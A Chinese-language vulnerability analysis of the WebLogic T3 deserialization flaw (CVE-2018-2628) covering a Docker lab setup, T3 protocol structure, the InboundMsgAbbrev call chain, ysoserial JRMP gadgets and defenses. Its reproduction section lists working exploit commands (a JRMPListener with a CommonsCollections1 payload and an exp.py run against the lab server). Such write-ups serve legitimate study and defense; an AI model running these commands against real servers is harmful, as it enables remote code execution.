WebLogic T3反序列化漏洞深入分析与实践<\/h1>

0x01 漏洞复现<\/h2>

环境搭建与漏洞验证<\/h3>

环境准备<\/strong>：<\/p>

使用Docker搭建WebLogic漏洞环境（默认开放7001端口）<\/li>
额外开放8055端口用于远程调试<\/li> <\/ul> <\/li>

漏洞验证步骤<\/strong>：<\/p>
# 启动JRMP监听服务<\/span> <\/span><\/span>java -cp ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.JRMPListener 8000<\/span> CommonsCollections1 "touch \/tmp\/temp"<\/span> <\/span><\/span> <\/span><\/span># 执行漏洞利用<\/span> <\/span><\/span>python exp.py 192.168.42.192 7001<\/span> .\/ysoserial-0.0.6-SNAPSHOT-all.jar 192.168.42.192 8000<\/span> JRMPClient <\/span><\/span> <\/span><\/span># 验证结果<\/span> <\/span><\/span>docker exec -it [<\/span>容器ID]<\/span> \/bin\/bash <\/span><\/span>ls \/tmp\/temp <\/span><\/span><\/code><\/pre><\/li> <\/ol> 远程调试环境配置<\/h3> 获取必要文件<\/strong>：<\/p> docker cp [<\/span>容器名称]<\/span>:\/root\/jdk [<\/span>目标路径]<\/span> <\/span><\/span>docker cp [<\/span>容器名称]<\/span>:\/root\/Oracle\/Middleware\/wlserver_10.3 [<\/span>目标路径]<\/span> <\/span><\/span> <\/span><\/span># 提取所有jar包<\/span> <\/span><\/span>cp `<\/span>find .\/wlserver_10.3\/ -name "*.jar"<\/span>`<\/span> .\/dep <\/span><\/span><\/code><\/pre><\/li> WebLogic调试配置<\/strong>：<\/p> 修改startDomainEnv.sh<\/code>： debugFlag=<\/span>"true"<\/span> <\/span><\/span>DEBUG_PORT=<\/span>"8055"<\/span> <\/span><\/span><\/code><\/pre><\/li> 更新docker-compose.yml开放8055端口<\/li> <\/ul> <\/li> IDEA配置<\/strong>：<\/p> 使用从容器中提取的JDK作为项目SDK<\/li> 添加所有提取的jar包为项目库<\/li> 配置远程调试连接（端口8055）<\/li> <\/ul> <\/li> <\/ol> 0x02 T3协议分析<\/h2> T3协议特征<\/h3> 协议结构<\/strong>：<\/p> 前4字节表示数据包大小（如00 00 06 d7<\/code>）<\/li> 固定头部（约100字节）<\/li> 序列化的Java对象数据<\/li> <\/ul> <\/li> 通信流程<\/strong>：<\/p> 客户端与服务器交换信息<\/li> 传输多个序列化对象<\/li> 服务器反序列化处理<\/li> <\/ul> <\/li> 攻击原理<\/strong>：<\/p> 替换传输的序列化对象为恶意对象<\/li> 利用服务器反序列化机制执行恶意代码<\/li> <\/ul> <\/li> <\/ol> 流量分析实验<\/h3> 实验代码<\/strong>：<\/p> 实现简单的RMI服务（Hello接口及实现）<\/li> 客户端通过T3协议与WebLogic通信<\/li> <\/ul> <\/li> 关键发现<\/strong>：<\/p> T3协议可一次传输多个对象<\/li> 对象按顺序反序列化<\/li> 协议头部有固定特征<\/li> <\/ul> <\/li> <\/ol> 0x03 相关技术概念区分<\/h2> JNDI与相关技术<\/h3> JNDI架构<\/strong>：<\/p> JNDI API ├─ RMI (远程方法调用) ├─ CORBA (公共对象请求代理) └─ LDAP (轻型目录访问协议) <\/code><\/pre> <\/li> RMI核心机制<\/strong>：<\/p> 依赖反序列化传输对象<\/li> 支持动态加载远程类（通过java.rmi.server.codebase<\/code>）<\/li> 客户端与服务端可互相加载类<\/li> <\/ul> <\/li> 攻击面<\/strong>：<\/p> 反序列化漏洞（继承参数类构造恶意对象）<\/li> 远程类加载（强制服务器加载恶意类）<\/li> <\/ul> <\/li> <\/ol> 0x04 漏洞深度分析<\/h2> 反序列化触发点<\/h3> 关键类<\/strong>：<\/p> weblogic.rjvm.InboundMsgAbbrev<\/code>（位于wlthint3client.jar）<\/li> ServerChannelInputStream<\/code>（继承自ObjectInputStream<\/code>）<\/li> <\/ul> <\/li> 调用链<\/strong>：<\/p> weblogic.socket → 读取字节流 → weblogic.rjvm → InboundMsgAbbrev → ObjectInputStream.readObject() → resolveClass() <\/code><\/pre> <\/li> 动态调试观察<\/strong>：<\/p> 按传入包顺序反序列化<\/li> 第一个包反序列化完成后处理RMI相关包<\/li> <\/ul> <\/li> <\/ol> ysoserial JRMP模块分析<\/h3> JRMPClient利用链<\/strong>：<\/p> RemoteObjectInvocationHandler → UnicastRef.readExternal() → DGCClient$EndpointEntry.makeDirtyCall() → 连接攻击者指定的JRMP服务 <\/code><\/pre> <\/li> JRMPListener工作流程<\/strong>：<\/p> 根据参数初始化Payload（如CommonsCollections1）<\/li> 监听指定端口等待连接<\/li> 收到连接后发送序列化恶意对象<\/li> <\/ul> <\/li> 完整攻击流程<\/strong>：<\/p> 攻击者启动JRMPListener<\/li> 构造T3协议恶意数据触发JRMPClient反序列化<\/li> 受害服务器连接攻击者JRMP服务<\/li> JRMP服务返回异常触发二次反序列化<\/li> 实现RCE<\/li> <\/ol> <\/li> <\/ol> 0x05 技术细节与优化<\/h2> 直接T3反序列化与JRMP迂回对比<\/h3> 直接利用限制<\/strong>：<\/p> Payload较大可能导致413错误<\/li> 受黑名单限制更严格<\/li> <\/ul> <\/li> JRMP迂回优势<\/strong>：<\/p> Payload更短小<\/li> 可用于检测（类似URLDNS）<\/li> 绕过部分黑名单（二次反序列化）<\/li> 有错误回显便于调试<\/li> <\/ul> <\/li> 直接利用方法<\/strong>：<\/p> 构造完整的CC1链序列化数据<\/li> 通过T3协议直接发送（需处理数据包大小限制）<\/li> <\/ul> <\/li> <\/ol> 关键防御思路<\/h3> 官方修复<\/strong>：<\/p> 增加反序列化黑名单<\/li> 限制T3协议访问<\/li> <\/ul> <\/li> 防护建议<\/strong>：<\/p> 关闭不必要的T3协议<\/li> 更新WebLogic补丁<\/li> 监控异常反序列化行为<\/li> <\/ul> <\/li> <\/ol> 附录：参考资源<\/h2> ysoserial JRMP相关模块分析<\/li> Java中RMI、JNDI、LDAP等技术关系解析<\/li> CVE-2018-2628官方分析报告<\/li> WebLogic T3协议官方文档<\/li> <\/ol> 注：本文所有实验应在授权环境下进行，严禁用于非法用途。<\/p> <\/blockquote>